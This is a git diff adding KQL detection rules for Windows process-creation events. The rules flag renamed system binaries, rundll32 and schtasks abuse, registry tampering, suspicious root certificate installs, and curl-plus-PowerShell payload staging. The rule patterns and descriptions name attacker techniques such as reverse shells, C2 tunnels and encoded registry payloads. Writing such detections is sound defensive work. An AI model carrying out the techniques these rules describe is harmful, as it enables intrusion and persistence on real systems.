diff --git a/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql
new file mode 100644
index 00000000..92202d6b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_visual_studio_code_tunnel_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Visual Studio Code Tunnel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-28
+// Level: high
+// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
+
+DeviceProcessEvents
+| where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql
new file mode 100644
index 00000000..484b703a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_vmnat_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Vmnat.exe Execution
+// Author: elhoim
+// Date: 2022-09-09
+// Level: high
+// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/renamed_whoami_execution.kql b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql
new file mode 100644
index 00000000..e869e646
--- /dev/null
+++ b/KQL/rules/windows/process_creation/renamed_whoami_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Whoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: critical
+// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/replace_exe_usage.kql b/KQL/rules/windows/process_creation/replace_exe_usage.kql
new file mode 100644
index 00000000..4a5b51be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/replace_exe_usage.kql
@@ -0,0 +1,10 @@
+// Title: Replace.exe Usage
+// Author: frack113
+// Date: 2022-03-06
+// Level: medium
+// Description: Detects the use of Replace.exe which can be used to replace file with another file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql
new file mode 100644
index 00000000..a4943872
--- /dev/null
+++ b/KQL/rules/windows/process_creation/response_file_execution_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Response File Execution Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql
new file mode 100644
index 00000000..a8632c16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/restrictedadminmode_registry_value_tampering_proccreation.kql
@@ -0,0 +1,12 @@
+// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql
new file mode 100644
index 00000000..97921781
--- /dev/null
+++ b/KQL/rules/windows/process_creation/root_certificate_installed_from_susp_locations.kql
@@ -0,0 +1,12 @@
+// Title: Root Certificate Installed From Susp Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql
new file mode 100644
index 00000000..5ae3f71a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ruby_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Ruby Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql
new file mode 100644
index 00000000..2afb89e2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/run_once_task_execution_as_configured_in_registry.kql
@@ -0,0 +1,10 @@
+// Title: Run Once Task Execution as Configured in Registry
+// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
+// Date: 2020-10-18
+// Level: low
+// Description: This rule detects the execution of Run Once task as configured in the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql
new file mode 100644
index 00000000..899fd381
--- /dev/null
+++ b/KQL/rules/windows/process_creation/run_powershell_script_from_ads.kql
@@ -0,0 +1,10 @@
+// Title: Run PowerShell Script from ADS
+// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql
new file mode 100644
index 00000000..985461e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/run_powershell_script_from_redirected_input_stream.kql
@@ -0,0 +1,10 @@
+// Title: Run PowerShell Script from Redirected Input Stream
+// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
+// Date: 2020-10-17
+// Level: high
+// Description: Detects PowerShell script execution via input stream redirect
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql
new file mode 100644
index 00000000..478a3349
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_execution_with_uncommon_dll_extension.kql
@@ -0,0 +1,10 @@
+// Title: Rundll32 Execution With Uncommon DLL Extension
+// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
+// Date: 2022-01-13
+// Level: medium
+// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql
new file mode 100644
index 00000000..fd90afa2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_execution_without_commandline_parameters.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Execution Without CommandLine Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+//   - Possible but rare
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql
new file mode 100644
index 00000000..14e734c2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_execution_without_parameters.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Execution Without Parameters
+// Author: Bartlomiej Czyz, Relativity
+// Date: 2021-01-31
+// Level: high
+// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
+// False Positives:
+//   - False positives may occur if a user called rundll32 from CLI with no options
+
+DeviceProcessEvents
+| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql
new file mode 100644
index 00000000..d34e1e69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_installscreensaver_execution.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 InstallScreenSaver Execution
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
+// Date: 2022-04-28
+// Level: medium
+// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.011, attack.defense-evasion
+// False Positives:
+//   - Legitimate installation of a new screensaver
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql
new file mode 100644
index 00000000..01fdf026
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_registered_com_objects.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Registered COM Objects
+// Author: frack113
+// Date: 2022-02-13
+// Level: high
+// Description: load malicious registered COM objects
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql
new file mode 100644
index 00000000..318cee1b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_spawned_via_explorer_exe.kql
@@ -0,0 +1,10 @@
+// Title: Rundll32 Spawned Via Explorer.EXE
+// Author: CD_ROM_
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql
new file mode 100644
index 00000000..37f35119
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_spawning_explorer.kql
@@ -0,0 +1,10 @@
+// Title: RunDLL32 Spawning Explorer
+// Author: elhoim, CD_ROM_
+// Date: 2022-04-27
+// Level: high
+// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql
new file mode 100644
index 00000000..07ea6d5e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rundll32_unc_path_execution.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 UNC Path Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql
new file mode 100644
index 00000000..a2c6dfe5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/runmru_registry_key_deletion.kql
@@ -0,0 +1,12 @@
+// Title: RunMRU Registry Key Deletion
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..73990aa8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/safeboot_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: SafeBoot Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
+// Date: 2022-08-08
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
new file mode 100644
index 00000000..60c74f99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql
@@ -0,0 +1,13 @@
+// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+//   - Benign scheduled tasks creations or executions that happen often during software installations
+//   - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR." and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
new file mode 100644
index 00000000..a66f86ff
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_masquerading_as_system_processes.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Creation Masquerading as System Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005
+// False Positives:
+//   - Legitimate system administration tasks scheduling trusted system processes.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
new file mode 100644
index 00000000..c12084fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_via_schtasks_exe.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task Creation Via Schtasks.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
+// False Positives:
+//   - Administrative activity
+//   - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
new file mode 100644
index 00000000..3a32711c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql
@@ -0,0 +1,14 @@
+// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
+// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate use of schtasks for administrative purposes.
+//   - Automation scripts combining curl and PowerShell in controlled environments.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
new file mode 100644
index 00000000..f2416006
--- /dev/null
+++ b/KQL/rules/windows/process_creation/scheduled_task_executing_encoded_payload_from_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Executing Encoded Payload from Registry
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
